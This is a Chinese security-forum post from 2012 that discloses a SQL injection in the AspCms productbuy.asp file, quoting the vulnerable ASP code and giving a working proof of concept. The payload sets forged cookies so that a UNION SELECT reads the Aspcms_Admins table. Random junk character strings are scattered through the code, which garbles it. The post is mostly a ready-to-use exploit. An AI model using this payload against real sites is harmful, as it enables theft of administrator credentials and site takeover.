好久没上土司了,上来一看发现在删号名单内.....0 G$ p/ G, A( t A! Q+ i$ \
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。2 C! l4 I4 b7 J2 Z4 R7 t
废话不多说,看代码:
- Y5 k$ g9 Y3 O- e( E3 V( h2 ^6 O0 ^7 W S! W, a7 L% l& W9 M
<%
$ B- | s! k- O0 }! `5 @2 c
3 I5 Y1 h/ Q- a$ l9 z" {if action = "buy" then3 \/ g( G; b. a9 L, a
2 r8 z( w2 y( F1 R addOrder()# u- v- ~- W0 [; J$ a
V8 h4 |" j4 Q5 s, b* n Q: kelse
& z7 a4 s3 ]/ g7 C# y. y2 T$ z S2 _8 q) r/ l
echoContent()2 v6 v8 C1 m/ x8 }' y- d7 ^
3 Y) h6 G: w1 \9 [# n* U. C$ s1 @
end if6 a# P; A6 }' C: ]' B9 w( T- f
( [! i' Q) d7 W# N0 p% K, P, E7 F% z$ Z$ L8 q1 J0 V* E
4 O( B+ Y1 J, U' D5 o3 w6 k……略过7 Y& a9 t5 r- A4 b
2 d$ X3 ~8 _& |& F) N7 a2 b) Z. m+ J2 k5 L' `. h5 M
0 O/ J2 {, k5 } q& ^- A1 i6 i0 l4 ]
Sub echoContent()
( C0 X; K+ T o
; x! |! M8 X$ u% d dim id
8 @7 w2 q. ]2 d4 C# ~1 J1 }! @3 `, }+ t# a1 ]2 T+ b
id=getForm("id","get")' Z' r! h5 I& W% K7 @
/ J) o4 I& z5 L3 S3 v0 T
( h, M& d! q* X2 g! h
- l* D1 S$ N% v5 J if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 8 v* X5 y+ u9 c2 [
. R9 P) @, `# a* X% l5 {
& v/ A y, z+ W F/ ~! L
# S# B8 a, H4 j) b dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
* c& w# U9 k' W* g8 t: l5 \8 V+ ]6 d
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
2 c- D7 ]% x( T$ ~, ^
# w6 ^" a5 w$ |9 x: t Dim templatePath,tempStr! l/ y9 {0 g6 E! H# V) V( k
: k- o) v, R! R; I* `6 E# U% m' x templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
- I% H r2 F9 B% V+ y5 y0 w+ a3 W' i2 i
5 w1 {8 ]) [0 p/ V
5 e t2 k& T* ^0 ~8 X
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")% s# b) r; l( j" j
4 q& |4 w8 u7 s& Q( f9 x
selectproduct=rsObj(0)
$ |5 \3 r9 A" b% R, C1 B
* w! E" S# o; H/ r9 k/ y$ {, e, D
, E) A4 U; B- P w T1 `8 j
1 l9 e5 z" `9 z5 [! q. f# q Dim linkman,gender,phone,mobile,email,qq,address,postcode
0 S0 N# P/ o- Q8 w0 b0 z H7 u% U9 V2 |( p
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",03 m* K& |9 d, v
3 H2 [+ S6 c5 p0 J4 m4 p
if rCookie("loginstatus")=1 then
( ~, ?; @) U/ q' n' Y& h; E
# g N( X; O# c: M3 Y. k' p, w* V set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
4 ]; I: |) A: d7 A6 A1 `8 d) J
0 u9 L7 ~% ?* j) h$ E. N linkman=rsObj("truename")8 p0 ^$ H: B8 c8 N6 i" R
! H! z( `# G- A# D; Y% O
gender=rsObj("gender")& _$ K9 \! d. A
+ ?7 R4 n6 h7 @* ?, Z' M, @
phone=rsObj("phone")
9 E4 _- W; G# M1 u
M. H& d6 O: N# u5 o: K mobile=rsObj("mobile")4 |5 @, ^' n; l$ B# y5 h4 P
5 h7 P- F1 y# [9 g email=rsObj("email")0 G6 c( c* A* b
. g" P) k0 S! g! ]( k# J* X9 O% H* z
qq=rsObj("qq")6 C( Z. t+ _+ P1 ]* G* X
3 O) R/ h$ i" K
address=rsObj("address")
- [8 M/ f; ?& _! l6 t$ v! G& o* X q& t5 Y. Y: ?/ t6 w4 X
postcode=rsObj("postcode")# |, x% L! F# J
- P2 x j" W7 m+ g3 b0 f else
* N8 e' Q8 x- |6 S* W, ^
( p- R/ t+ C: ] J! ~# M0 R7 F gender=1 Y4 L2 e* e' N" D. F8 K
3 h( T* h) v& q/ L p( r! |, o: T end if! I3 O% |7 ]7 Z; A, I& w) P* U
7 u$ s; W i8 j# s
rsObj.close()% k r; W3 [7 P: }# l# r
+ O: b1 q7 t8 m9 W
0 }& E, F" r: |- r7 G2 l; R: l$ l. O8 k* J$ J1 ^! v9 D9 f
with templateObj : w5 o& j( f* D' _) h* _6 p; \
1 h8 c0 Q0 V8 R D: ~ .content=loadFile(templatePath) $ z5 W4 }* p4 ^
' U1 N5 o% {5 o* n$ E, o2 M0 f1 ]
.parseHtml() S7 H3 G7 g' C* z
& d4 E k5 O- t6 g! d8 t3 t .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct); x8 j( d# u* E, w7 k
0 j1 Q$ g, w8 Q& L0 U .content=replaceStr(.content,"[aspcms:linkman]",linkman) : V7 K/ ]" ^% V5 K
/ X6 o: W- p0 ~! Z
.content=replaceStr(.content,"[aspcms:gender]",gender)
1 `' _! p% d2 Y+ ?
. H: F" c5 m. X; p w% g .content=replaceStr(.content,"[aspcms:phone]",phone) ( E& m+ m8 H% ^6 n2 w# P
0 R- N- _! t, y( M% A' B- t
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
2 A4 t7 d: y# s, `; C: q U3 \( l5 a2 `5 U2 K- _5 f/ m
.content=replaceStr(.content,"[aspcms:email]",email)
+ O; i$ |' j Q+ E9 U- P! a6 b7 U( Q0 }7 c) F+ O6 p
.content=replaceStr(.content,"[aspcms:qq]",qq) ) M7 U$ k0 s" Z; T- _0 o
4 }0 K# b6 @ P: S; t, U) r2 |: { .content=replaceStr(.content,"[aspcms:address]",address) ( W" R& h+ u# T/ N
7 c7 t/ L3 K+ X1 q, \; l
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
5 V9 ]& ~ }" ~: z' m; V! ?0 y) z
6 L6 H$ E% f) {% a0 @% {$ x! F' l .parseCommon()
. K& ~! {: @1 s, p' s- D% _4 H! }8 p; D: a/ r p8 u
echo .content : n! b; U7 ?, }* B& _9 _) i
. P# F7 X! X( Z/ V3 A9 S& t n end with+ M s5 |* N* [* @) m
( ^# U7 v, e0 m. } set templateobj =nothing : terminateAllObjects
# q, @4 e" j3 \( J+ Z/ i9 c# |' t% ~/ {. |! Y
End Sub
: M% ^8 ]4 k6 y) @$ T漏洞很明显,没啥好说的: p+ W, G) @) ]8 O2 C) q }6 j& _9 M
poc:. ]* _ M2 D! T4 ?
$ c7 i+ I R2 K" E) V& q! djavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
2 o/ a" p$ q$ V9 D+ G2 u4 K
4 _* I |* \8 {+ L/ J# F g+ [ |
发表于 2012-12-27 08:35:05
收藏
支持
反对